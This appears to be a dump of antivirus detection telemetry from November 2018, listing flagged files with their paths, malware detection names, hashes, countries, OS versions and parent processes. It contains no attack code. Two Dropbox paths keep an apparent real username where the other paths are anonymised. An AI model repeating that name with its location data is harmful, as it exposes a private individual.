  Row(detection=Row(filename='fsquirt.exe', filepath='\\\\?\\C:\\Windows\\System32\\DriverStore\\FileRepository\\bth.inf_x86_neutral_2d4ce84c4a0b8470\\fsquirt.exe', filesize=256000, name='W32/Jeefo.A.#M1.#R1'), hash='008481c28a2a861377486941623a260eb0393dd1acb91585e509c08c3ce232b8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:54:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:59:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203535-83cc642c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_08078342\\AVSCAN-20181104-200903-DD5905B7\\AVSCAN-20181104-203535-83CC642C', filesize=5600000, name='PUA/MyPCBackup.#M1.#R1'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:35:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3340759\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='F:\\PUBG Mobile for Windows Downloader - JalanTikus.exe', parentsize=2919016, timestamp='2018-11-04T07:31:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='panorama.dll', filepath='D:\\@STEAM!\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='7b10276e5701c1a391e40686cbe8e2dd94256bd6d9bb74387d81e86c825eb970', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:36:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131004-11f2cc9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131004-11F2CC9C', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:10:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4741448\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:58:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pes2013.exe', filepath='D:\\PES 200013\\pes2013.exe', filesize=20000000, name='W32/Ramnit.C.#M1.#R1'), hash='936a7bb3003416d18d1932545061d91bf18884e5b1d70aba1d2704b8bc6e97f3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T08:48:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165740-f4b2dea6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aecba046\\AVSCAN-20181104-151649-9568111F\\AVSCAN-20181104-165740-F4B2DEA6', filesize=1668000, name='ADWARE/Plush.geru.#M1.#R1'), hash='827f119327fc856dadfb2a73419d27dca92f80310099beb9e0a72afcb2a03ad5', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:57:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ndp46-kb3045557-x86-x64-allos-enu.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\DotNet\\NDP46-KB3045557-x86-x64-AllOS-ENU.exe', filesize=192000, name='W32/Stanit.#M1.#R1'), hash='52d8475c5be4f6e846c1f874db950e23ed62d61eab5235715fdaf5b4917ada19', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:28:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8dce', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8dce', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-181223-269eaeea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3be9c2bd\\AVSCAN-20181104-180534-D5BE5E3E\\AVSCAN-20181104-181223-269EAEEA', filesize=832000, name='HEUR/APC.#M1.#R1'), hash='c04100433a92893732ec84902b22532a3f937c0efa604f7589c5332599a565c0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:12:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:32:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T05:12:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='scmini.exe', filepath='c:\\program files (x86)\\smartcloudinput\\1.3.6.10910\\scmini.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='9ea296ef2d26b518fc5a206d110163bf53cdb924e081a145c6c057aa546834ac', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-04T06:12:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T22:14:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-085849-217ec403', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca757762\\AVSCAN-20181104-084814-A417CACE\\AVSCAN-20181104-085849-217EC403', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T01:58:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ppj2dd.exe', filepath='k:\\برنامج رامز واكل الجو\\العاب\\حرب عصابات\\PPJ2DD.EXE', filesize=1024000, name='TR/Patched.Gen.#M300.#R2947'), hash='5a592f53d779263e37fefffc068def3ca331c552d426db825e18b6b5d7c6b1c6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:31:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:17:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:10:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='store-v1.exe', filepath='D:\\.Spotlight-V100\\Store-V1.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:17:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-135531-e67677e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9336ead\\AVSCAN-20181104-135442-E1F20C68\\AVSCAN-20181104-135531-E67677E2', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:55:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='installe.', filepath='CLICK_HE.APP/CONTENTS/MACOS/INSTALLE.', filesize=196000, name='Adware/OSX.Genieo.lvmpr.#M0.#R0'), hash='b3905883dd74ad5d2e92d9824b8110b0d06a0cf0fd18a36f8bf82ffa0a954a6e', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='18', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T15:22:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-172855-425f87b5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8092673d\\AVSCAN-20181101-023524-08855CD5\\AVSCAN-20181104-172855-425F87B5', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='4db969b4b642d10e55a99d3d805e1c6a1bf100ba926f4649b0b101d94f4eb883', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:28:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kms10.exe', filepath='\\\\?\\C:\\Windows\\KMS10\\KMS10.exe', filesize=2176000, name='SPR/HackKMS.d5c565.#M1.#R1'), hash='d5c56597bf7381a46cd51bc26ff6a004945bc08a2760197ae45b98d904d14268', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:41:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:23:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201938-a2b039f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-201807-925018B6\\AVSCAN-20181104-201938-A2B039F8', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:19:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165835-3f56ff44', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-155710-6095B825\\AVSCAN-20181104-165835-3F56FF44', filesize=256000, name='TR/AD.Inject.Y.#M1.#R1'), hash='4ef0a023932d5f073dd817ae3a7b569f22edbed4afc4e6728f7dcc5884584283', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:58:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T00:04:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='9c67d4b80f9a02748f4eafdfac44da2d649821c6110e678936d50dc459ecc596', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T07:33:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\Desktop\\devfoam\\setup.exe', filesize=3328000, name='TR/Crypt.Agent.ca2a13.#M1.#R1'), hash='ca2a137a1db4dd4738bf9e58e630982fece26fb01eb1a59ac544641f8388f582', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4245072, timestamp='2018-11-04T20:35:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-021852-770a19de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-021852-770A19DE', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='d1652185c892b5b6d06cd76d0fcd97b20713f3ab628cf34d8a3690bf4b70e4fd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:20:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-033338-6d0aab00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-033338-6D0AAB00', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='f970770bcc81d2cd755852fe59a587caa2d16f5ec03a7877e56650cdef4754ef', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninstall.exe', filepath='C:\\Users\\X\\AppData\\Local\\Chromium\\Application\\45.0.2422.0\\Installer\\uninstall.exe', filesize=960000, name='W32/Ramnit.CD.#M1.#R1'), hash='a827326619753b94dff2da67230725a0608964d1e771f58357406dcd4e0dc709', metadata=Row(cmdline='--engine=2 --session-id=73T0oNtQ1kqyOo1+zqVm4b0r+QolLIeok7bLq8NI --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --srt-field-trial-group-name=NewCleanerUIExperiment', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=12084856, timestamp='2018-11-02T01:38:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160833-49189a89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_53363b79\\AVSCAN-20181102-160504-2465731B\\AVSCAN-20181102-160833-49189A89', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a3f1f27443b1201b01fefdae9e5b5f27a3ac6422359ea85a8f89a2d5d080e148', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:08:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T23:55:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehendwdvgl.exe', filepath='c:\\users\\X\\appdata\\roaming\\ehendwdvgl.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T20:14:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unrhino.exe', filepath='\\\\192.168.1.7\\圖檔總目錄\\備用\\CAD\\Rhinoceros 1.1 Evaluation\\UNRHINO.EXE', filesize=128000, name='HEUR/Patched.Ren.#M1.#R1'), hash='ed9c7ab34a3206cd92f9364af4984b5b4c424d4dd432e3d05b1101a5c1e7e8e5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Cobian Backup 11\\Cobian.exe', parentsize=720896, timestamp='2018-11-02T15:36:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lightmaps.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL2\\lightmaps\\lightmaps.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='fcacdeeecabea03fd1d2a9e924a85f96d0fed56f05c38b3f85fc7e84f222c600', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='computer.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\COMPUTER\\COMPUTER.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='75afa9a82f394c1ae3b1bf27314a64a87bddd0cfd5f8a1508409ecd5a0cde3ba', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:33:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='18', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T15:34:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dffsetup-msvcp120 (1).exe', filepath='C:\\Users\\X\\Documents\\Downloads\\dffsetup-msvcp120 (1).exe', filesize=5444000, name='PUA/Systweak.#M1.#R1'), hash='c8f28ea521eb29b88e8279c4e7b5df617cf50c64764bde1a443883b3a13046be', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:49:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kgkcp.exe', filepath='c:\\users\\X\\appdata\\roaming\\kgkcp.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=430592, timestamp='2018-11-02T12:45:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lzatcyej.exe', filepath='c:\\users\\X\\appdata\\roaming\\lzatcyej.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T13:25:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zanyscn.exe', filepath='c:\\users\\X\\appdata\\roaming\\zanyscn.exe', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', parentsize=452608, timestamp='2018-11-02T17:20:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='atheros_ar956x_wireless_network_adapter_10.0.0.313_win7_amd64.exe', filepath='G:\\DRIVE RESTOR\\WIND7-64+\\Atheros_AR956x_Wireless_Network_Adapter_10.0.0.313_win7_amd64.exe', filesize=2048000, name='HEUR/AGEN.1009067.#M1.#R1'), hash='73be95465d13bff9c1a2cf0a9dd51838f688ddb46e6e1547c7d9a1ba645cf2f7', metadata=Row(cmdline='0x84c', country='BH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\audiodg.exe', parentsize=None, timestamp='2018-11-02T06:35:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-014347-7289e777', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-014347-7289E777', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='de903792ea55afaa587429189f2dd3ea98c1c692b964acf881df5892e2769de4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='berkeliumz.exe', filepath='\\\\?\\E:\\MojiZ\\berkeliumz.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='b896ce74ce86866fd73d73c3c5f5b7308026584610aa6acca9a28063948d8e94', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:21:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='freespin.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\as\\FreeSpin\\FreeSpin.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='c8b2350b7e53a3d3f0a0a513ca9b707f15902e005370150621b869b8f1e6a9d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:11Z'), dt=datetime.date(2018, 11, 2)),
